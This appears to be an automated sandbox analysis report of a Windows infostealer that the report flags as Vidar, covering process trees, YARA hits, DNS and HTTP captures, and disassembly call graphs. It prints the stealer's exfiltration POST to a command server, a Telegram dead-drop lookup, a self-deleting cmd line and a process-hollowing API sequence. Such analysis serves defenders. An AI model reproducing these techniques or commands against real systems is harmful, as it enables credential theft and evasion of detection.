                                                              Jul 3, 2024 02:22:52.181680918 CEST8.8.8.8192.168.2.220x7a5dNo error (0)tea.arpdabl.org185.107.56.202A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:53.871582031 CEST8.8.8.8192.168.2.220xd165No error (0)survey-smiles.com199.59.243.226A (IP address)IN (0x0001)false
                                                              Jul 3, 2024 02:22:53.871592045 CEST8.8.8.8192.168.2.220xd165No error (0)survey-smiles.com199.59.243.226A (IP address)IN (0x0001)false
                                                              • t.me
                                                              • tea.arpdabl.org
                                                              • survey-smiles.com
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.2249185185.107.56.20280204C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              TimestampBytes transferredDirectionData
                                                              Jul 3, 2024 02:22:52.187213898 CEST281OUTPOST / HTTP/1.1
                                                              Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB
                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1
                                                              Host: tea.arpdabl.org
                                                              Content-Length: 4761
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 3, 2024 02:22:52.187232018 CEST1236OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 30 65 38 31 65
                                                              Data Ascii: ------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="token"f0e81e80e6f91df4ecf4887ed4e401e5------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="build_id"67fd81bf99f2a8aaa5bc79a1cfb25860------GHJEGCAEGIIIDH
                                                              Jul 3, 2024 02:22:52.192145109 CEST3525OUTData Raw: 78 48 70 33 2f 55 6d 63 76 63 4e 7a 34 4f 42 6f 4f 52 35 4f 75 65 66 37 70 6e 41 77 48 2f 64 55 34 33 52 59 66 56 54 47 39 7a 74 34 33 38 54 66 66 6d 2b 2f 4e 39 2b 5a 37 38 2f 33 2f 76 75 65 64 53 5a 77 6b 50 31 37 31 35 50 4e 49 7a 36 76 32 6e
                                                              Data Ascii: xHp3/UmcvcNz4OBoOR5Ouef7pnAwH/dU43RYfVTG9zt438Tffm+/N9+Z78/3/vuedSZwkP1715PNIz6v2no5iPZVwkQi8+ofYMWAfwR2IZpVay09goGFS/DC86w+n3gyjYX8/8VLrRSKhuyx0KjHEaIARx2Y2hikZ6K8qSQRcqELO9RYcXs+DztZ3QWbGeHSCc1rnj9yBUNhFZCKbSRi1N/SzJDUrdImUYKLKFXYr3XfvsEVhFr
                                                              Jul 3, 2024 02:22:52.823086023 CEST364INHTTP/1.1 302 Found
                                                              cache-control: max-age=0, private, must-revalidate
                                                              connection: close
                                                              content-length: 11
                                                              date: Wed, 03 Jul 2024 00:22:52 GMT
                                                              location: http://survey-smiles.com
                                                              server: nginx
                                                              set-cookie: sid=6305125f-38d2-11ef-a8ad-bd9200aff948; path=/; domain=.arpdabl.org; expires=Mon, 21 Jul 2092 03:36:59 GMT; max-age=2147483647; HttpOnly
                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                              Data Ascii: Redirecting
                                                              Jul 3, 2024 02:22:53.867928982 CEST364INHTTP/1.1 302 Found
                                                              cache-control: max-age=0, private, must-revalidate
                                                              connection: close
                                                              content-length: 11
                                                              date: Wed, 03 Jul 2024 00:22:52 GMT
                                                              location: http://survey-smiles.com
                                                              server: nginx
                                                              set-cookie: sid=6305125f-38d2-11ef-a8ad-bd9200aff948; path=/; domain=.arpdabl.org; expires=Mon, 21 Jul 2092 03:36:59 GMT; max-age=2147483647; HttpOnly
                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                              Data Ascii: Redirecting
                                                              Jul 3, 2024 02:22:53.868264914 CEST364INHTTP/1.1 302 Found
                                                              cache-control: max-age=0, private, must-revalidate
                                                              connection: close
                                                              content-length: 11
                                                              date: Wed, 03 Jul 2024 00:22:52 GMT
                                                              location: http://survey-smiles.com
                                                              server: nginx
                                                              set-cookie: sid=6305125f-38d2-11ef-a8ad-bd9200aff948; path=/; domain=.arpdabl.org; expires=Mon, 21 Jul 2092 03:36:59 GMT; max-age=2147483647; HttpOnly
                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                              Data Ascii: Redirecting


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.2249186199.59.243.22680204C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              TimestampBytes transferredDirectionData
                                                              Jul 3, 2024 02:22:53.877269030 CEST190OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1
                                                              Host: survey-smiles.com
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Jul 3, 2024 02:22:54.343182087 CEST1236INHTTP/1.1 200 OK
                                                              date: Wed, 03 Jul 2024 00:22:53 GMT
                                                              content-type: text/html; charset=utf-8
                                                              content-length: 1050
                                                              x-request-id: baf82661-e91b-444a-95fc-a8abc3fa4f75
                                                              cache-control: no-store, max-age=0
                                                              accept-ch: sec-ch-prefers-color-scheme
                                                              critical-ch: sec-ch-prefers-color-scheme
                                                              vary: sec-ch-prefers-color-scheme
                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bOyrtEQgEacVTQVL07rMryNWN/tdja5XEp5A+mj9aHBpIGKa59fGMZby2F36oMS5dP6jBJrMQZ/LFH1Jv93hKg==
                                                              set-cookie: parking_session=baf82661-e91b-444a-95fc-a8abc3fa4f75; expires=Wed, 03 Jul 2024 00:37:54 GMT; path=/
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 4f 79 72 74 45 51 67 45 61 63 56 54 51 56 4c 30 37 72 4d 72 79 4e 57 4e 2f 74 64 6a 61 35 58 45 70 35 41 2b 6d 6a 39 61 48 42 70 49 47 4b 61 35 39 66 47 4d 5a 62 79 32 46 33 36 6f 4d 53 35 64 50 36 6a 42 4a 72 4d 51 5a 2f 4c 46 48 31 4a 76 39 33 68 4b 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bOyrtEQgEacVTQVL07rMryNWN/tdja5XEp5A+mj9aHBpIGKa59fGMZby2F36oMS5dP6jBJrMQZ/LFH1Jv93hKg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                              Jul 3, 2024 02:22:54.343272924 CEST484INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmFmODI2NjEtZTkxYi00NDRhLTk1ZmMtYThhYmMzZmE0Zjc1IiwicGFnZV90aW1lIjoxNzE5OTY2MTc0LCJwYWdlX3VybCI6I


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.2249161149.154.167.99443204C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 00:22:20 UTC85OUTGET /bu77un HTTP/1.1
                                                              Host: t.me
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-07-03 00:22:20 UTC511INHTTP/1.1 200 OK
                                                              Server: nginx/1.18.0
                                                              Date: Wed, 03 Jul 2024 00:22:20 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 12322
                                                              Connection: close
                                                              Set-Cookie: stel_ssid=d1e222eee8c843edfb_3455152776784339756; expires=Thu, 04 Jul 2024 00:22:20 GMT; path=/; samesite=None; secure; HttpOnly
                                                              Pragma: no-cache
                                                              Cache-control: no-store
                                                              X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                              Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                              Strict-Transport-Security: max-age=35768000
                                                              2024-07-03 00:22:20 UTC12322INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 62 75 37 37 75 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @bu77un</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:20:22:13
                                                              Start date:02/07/2024
                                                              Path:C:\Users\user\Desktop\82xul16VKj.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\82xul16VKj.exe"
                                                              Imagebase:0x400000
                                                              File size:1'608'192 bytes
                                                              MD5 hash:EB2F14B68AA11A4AEA94985C87714811
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:Borland Delphi
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:20:22:15
                                                              Start date:02/07/2024
                                                              Path:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\AppData\Local\Temp\kat2B07.tmp
                                                              Imagebase:0x400000
                                                              File size:881'664 bytes
                                                              MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 4%, ReversingLabs
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:20:22:53
                                                              Start date:02/07/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2B07.tmp" & rd /s /q "C:\ProgramData\GHDAAKJEGCFC" & exit
                                                              Imagebase:0x4a910000
                                                              File size:302'592 bytes
                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:20:22:54
                                                              Start date:02/07/2024
                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:timeout /t 10
                                                              Imagebase:0x220000
                                                              File size:27'136 bytes
                                                              MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:51.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:64.1%
                                                                Total number of Nodes:39
                                                                Total number of Limit Nodes:0
                                                                execution_graph 391 2eeca10 392 2eeca49 391->392 400 2eecae1 392->400 401 2eeb250 392->401 396 2eecb15 419 2eeb9b0 396->419 398 2eecba7 422 2eebef0 NtAllocateVirtualMemory 398->422 402 2eeb275 401->402 403 2eeb9b0 VirtualAlloc 402->403 404 2eeb30f 403->404 405 2eeb389 NtCreateFile 404->405 411 2eeb321 404->411 406 2eeb42b 405->406 407 2eeb434 405->407 406->407 408 2eeb436 CreateFileMappingA 406->408 407->411 412 2eeb4bc CloseHandle 407->412 409 2eeb494 MapViewOfFile 408->409 410 2eeb464 CreateFileMappingA 408->410 409->407 410->407 410->409 411->396 413 2eeb510 411->413 412->411 415 2eeb55e 413->415 414 2eeb577 414->396 415->414 416 2eeb62d NtProtectVirtualMemory 415->416 432 2eebb50 416->432 420 2eeb9f1 419->420 421 2eeba24 VirtualAlloc 420->421 421->398 423 2eebf80 422->423 424 2eec0f7 GetTempFileNameA 423->424 434 2eeb690 424->434 426 2eec11b CreateFileA WriteFile 427 2eec180 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 2eec22a 427->428 429 2eec28e Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 2eec251 WriteProcessMemory 428->430 429->400 430->428 433 2eeb65c NtProtectVirtualMemory 432->433 433->414 436 2eeb695 434->436 437 2eebad0 438 2eeb9b0 VirtualAlloc 437->438 439 2eebadd 438->439

                                                                Callgraph

                                                                Control-flow Graph

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 02EEBF61
                                                                • GetTempFileNameA.KERNEL32(?,kate,00000000,?), ref: 02EEC114
                                                                • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 02EEC142
                                                                • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 02EEC16C
                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 02EEC1B6
                                                                • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 02EEC1D0
                                                                • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 02EEC1FB
                                                                • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 02EEC21F
                                                                • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 02EEC281
                                                                • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 02EEC2DA
                                                                • ResumeThread.KERNELBASE(?), ref: 02EEC2EC
                                                                • ExitProcess.KERNELBASE(00000000), ref: 02EEC2F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$FileMemoryWrite$CreateThreadVirtual$AllocAllocateContextExitNameResumeSectionTempUnmapViewWow64
                                                                • String ID: kate
                                                                • API String ID: 805568384-4076676908
                                                                • Opcode ID: f8ea1b00e8faf37c5129c5e81034ef3e4365e7e5ae890ed18d1e7004deb17f8e
                                                                • Instruction ID: 093bb18f159d91000786c94422894ed8689c665f633e3ac8c42bb52cb96dc630
                                                                • Opcode Fuzzy Hash: f8ea1b00e8faf37c5129c5e81034ef3e4365e7e5ae890ed18d1e7004deb17f8e
                                                                • Instruction Fuzzy Hash: 9BE1D875A00209AFDB54CF84C895FEEB7B5BF88304F108199E909AB391D771AE85CF94

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 02EEB9B0: VirtualAlloc.KERNELBASE(00000000,02EEB30F,00003000,00000040), ref: 02EEBA34
                                                                • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 02EEB41B
                                                                • CloseHandle.KERNELBASE(00000000), ref: 02EEB4CC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocCloseCreateFileHandleVirtual
                                                                • String ID: @
                                                                • API String ID: 1754036434-2766056989
                                                                • Opcode ID: da227e9e93301028f75300d3467e18528c054984f706cc45e9426a4c5e36ed3a
                                                                • Instruction ID: 286bd0f98a63379b700fe186c4bb88c72f133780637fd1b46be20d2be4823bce
                                                                • Opcode Fuzzy Hash: da227e9e93301028f75300d3467e18528c054984f706cc45e9426a4c5e36ed3a
                                                                • Instruction Fuzzy Hash: 9381FB71A40218EFDB24DF54CC95FDAB3B5BF88704F1481A9EA09AB290D7706A84CF94

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 59 2eeb510-2eeb575 call 2eeb140 62 2eeb57e-2eeb593 59->62 63 2eeb577-2eeb579 59->63 65 2eeb59c-2eeb5b4 62->65 66 2eeb595-2eeb597 62->66 64 2eeb681-2eeb684 63->64 67 2eeb5bf-2eeb5c9 65->67 66->64 68 2eeb5cb-2eeb5db 67->68 69 2eeb617-2eeb61b 67->69 70 2eeb5dd-2eeb613 68->70 71 2eeb615 68->71 72 2eeb61d-2eeb621 69->72 73 2eeb629-2eeb62b 69->73 70->69 71->67 72->73 75 2eeb623-2eeb627 72->75 73->64 75->73 76 2eeb62d-2eeb67c NtProtectVirtualMemory call 2eebb50 NtProtectVirtualMemory 75->76 76->64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .tex
                                                                • API String ID: 0-1946526065
                                                                • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                • Instruction ID: 7ad099ed111c6d89017016cd5ef87b6ea0de3c4f3f8ba8aa12ba651864b9b613
                                                                • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                                • Instruction Fuzzy Hash: AB51B6B1D00109DFDF04CF84D894BEEBBB5FB48318F24955DD516AB280D775AA85CBA0

                                                                Control-flow Graph

                                                                APIs
                                                                • VirtualAlloc.KERNELBASE(00000000,02EEB30F,00003000,00000040), ref: 02EEBA34
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID: VirtualAlloc
                                                                • API String ID: 4275171209-164498762
                                                                • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                • Instruction ID: 1cbd641ca1a66a2f6c295437bb26164b0ce479e4218d40640305f42725e95b94
                                                                • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                                • Instruction Fuzzy Hash: 79114260D082CDDEEF01DBE8C4097EFBFB55F11708F044098D5456B282D2BA57588BB6

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 188 2eec510-2eec56a 189 2eec571-2eec581 188->189 190 2eec61b-2eec623 189->190 191 2eec587-2eec616 189->191 191->189
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.342512838.0000000002EEB000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2eeb000_82xul16VKj.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a568a7dc076fac4237d36aa73511bb81ae5ea1128cbd7157671a2a4345687388
                                                                • Instruction ID: fb53fbf2b461b35d6408dc6fa5903007cbe808f59fa336274b3a7d372e0377d0
                                                                • Opcode Fuzzy Hash: a568a7dc076fac4237d36aa73511bb81ae5ea1128cbd7157671a2a4345687388
                                                                • Instruction Fuzzy Hash: 4841A171D1051C9BDF48CFADC891AEEBBF2AF88201F648299D516AB345D730AB41DB80

                                                                Execution Graph

                                                                Execution Coverage:0.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:86
                                                                Total number of Limit Nodes:12
                                                                execution_graph 74352 1d731ca3 74353 1d930e37 74352->74353 74355 1d930e77 74353->74355 74356 1d731a41 74353->74356 74356->74355 74357 1d932d93 74356->74357 74360 1d731401 74357->74360 74359 1d932dce 74359->74355 74360->74359 74361 1d910f65 74360->74361 74366 1d910494 74361->74366 74363 1d910f70 74364 1d910fb6 LCMapStringW 74363->74364 74365 1d910f76 74363->74365 74364->74365 74365->74359 74369 1d9106b1 74366->74369 74370 1d9106e1 74369->74370 74371 1d9104aa 74369->74371 74370->74371 74376 1d9105b4 74370->74376 74371->74363 74374 1d9106fb GetProcAddress 74374->74371 74375 1d91070b 74374->74375 74375->74371 74382 1d9105c5 74376->74382 74377 1d91065b 74377->74371 74377->74374 74378 1d9105e3 LoadLibraryExW 74379 1d910662 74378->74379 74380 1d9105fe GetLastError 74378->74380 74379->74377 74381 1d910674 FreeLibrary 74379->74381 74380->74382 74381->74377 74382->74377 74382->74378 74383 1d910631 LoadLibraryExW 74382->74383 74383->74379 74383->74382 74384 1d73fd40 74386 1d73fd67 74384->74386 74385 1d73fdf4 ReadFile 74385->74386 74387 1d73fd83 74385->74387 74386->74385 74386->74387 74388 1d747d30 74389 1d747d43 74388->74389 74391 1d747d49 74388->74391 74392 1d8c8d80 74389->74392 74393 1d8c8d8f __vsnprintf 74392->74393 74395 1d8c8e6f 74393->74395 74396 1d744cf0 74393->74396 74395->74391 74398 1d744d30 74396->74398 74397 1d744ed5 CreateFileW 74397->74398 74398->74397 74399 1d74506d 74398->74399 74399->74395 74400 1d733b66 74401 1d8d461a 74400->74401 74404 1d7337bf 74401->74404 74403 1d8d4634 ___scrt_uninitialize_crt 74404->74403 74405 1d8d6666 74404->74405 74410 1d731929 ___vcrt_initialize_locks 74405->74410 74407 1d8d666b 74409 1d8d666f 74407->74409 74412 1d73344f 74407->74412 74409->74403 74410->74407 74411 1d8dfad2 74410->74411 74411->74407 74412->74409 74413 1d8dfa72 74412->74413 74415 1d8dfa87 74413->74415 74416 1d731492 7 API calls ___vcrt_FlsFree 74413->74416 74415->74409 74416->74415 74417 1d733a44 74418 1d8e7174 74417->74418 74420 1d8e7182 74418->74420 74421 1d8e6761 74418->74421 74422 1d8e676a 74421->74422 74424 1d8e6777 74421->74424 74422->74424 74425 1d8e67cf 74422->74425 74424->74420 74426 1d8e67db 74425->74426 74427 1d8e67d8 74425->74427 74430 1d73361b 74426->74430 74427->74424 74429 1d8e67e1 74429->74424 74430->74429 74431 1d918092 74430->74431 74433 1d9180cd 74431->74433 74434 1d917e1d 74431->74434 74433->74429 74435 1d917e47 74434->74435 74438 1d917ae4 74435->74438 74437 1d917e4f 74437->74433 74439 1d917af6 74438->74439 74440 1d917b05 GetOEMCP 74439->74440 74441 1d917b17 74439->74441 74442 1d917b2e 74440->74442 74441->74442 74443 1d917b1c GetACP 74441->74443 74442->74437 74443->74442 74444 1d8e04c2 74445 1d8e04df 74444->74445 74449 1d8e04e3 74444->74449 74446 1d8e054b GetProcAddress 74446->74445 74448 1d8e0559 74446->74448 74448->74445 74449->74445 74449->74446 74450 1d8e053c 74449->74450 74452 1d8e066b LoadLibraryExW 74449->74452 74450->74446 74451 1d8e0544 FreeLibrary 74450->74451 74451->74446 74453 1d8e06b2 74452->74453 74454 1d8e0682 GetLastError 74452->74454 74453->74449 74454->74453 74455 1d8e068d 74454->74455 74455->74453 74456 1d8e06a3 LoadLibraryExW 74455->74456 74456->74449

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 1d744cf0-1d744d2f 1 1d744d30-1d744d86 call 1d73263a 0->1 4 1d744daf 1->4 5 1d744d88-1d744d9b call 1d8c7fb0 1->5 7 1d744db3-1d744dc2 call 1d8c9a70 4->7 10 1d744da1-1d744dad 5->10 11 1d7452cd-1d7452df call 1d7325bd 5->11 14 1d74526f-1d745271 7->14 15 1d744dc8-1d744ddb 7->15 10->7 17 1d745273-1d74527a 14->17 18 1d7452c8 14->18 16 1d744de0-1d744df0 15->16 25 1d744df2-1d744dfe 16->25 26 1d744e3c-1d744e43 16->26 20 1d74527c-1d745283 17->20 21 1d7452be 17->21 18->11 23 1d745285-1d74528c 20->23 24 1d74528f-1d7452b3 20->24 27 1d7452c5 21->27 23->24 24->18 40 1d7452b5-1d7452bc 24->40 30 1d744e4d-1d744e68 25->30 39 1d744e00-1d744e03 25->39 29 1d744e45-1d744e47 26->29 26->30 27->18 29->30 32 1d74506d-1d74507b call 1d732f5e 29->32 33 1d744e71-1d744e7f 30->33 34 1d744e6a-1d744e6f 30->34 46 1d74507d-1d745084 32->46 47 1d7450eb-1d745102 call 1d7325bd 32->47 37 1d744e81-1d744e94 call 1d733f53 33->37 34->37 50 1d744e96-1d744eaa call 1d7dcab0 37->50 51 1d744eac 37->51 43 1d744e25-1d744e3a 39->43 44 1d744e05-1d744e08 39->44 40->27 43->16 44->43 48 1d744e0a-1d744e0d 44->48 52 1d745086-1d74508d 46->52 53 1d7450e1-1d7450e8 46->53 48->43 54 1d744e0f-1d744e12 48->54 62 1d744eae-1d744ed1 50->62 51->62 58 1d74508f-1d745096 52->58 59 1d745099-1d7450bd 52->59 53->47 54->43 60 1d744e14-1d744e17 54->60 58->59 59->47 80 1d7450bf-1d7450e0 call 1d7325bd 59->80 60->43 65 1d744e19-1d744e1c 60->65 66 1d744ed5-1d744eec CreateFileW 62->66 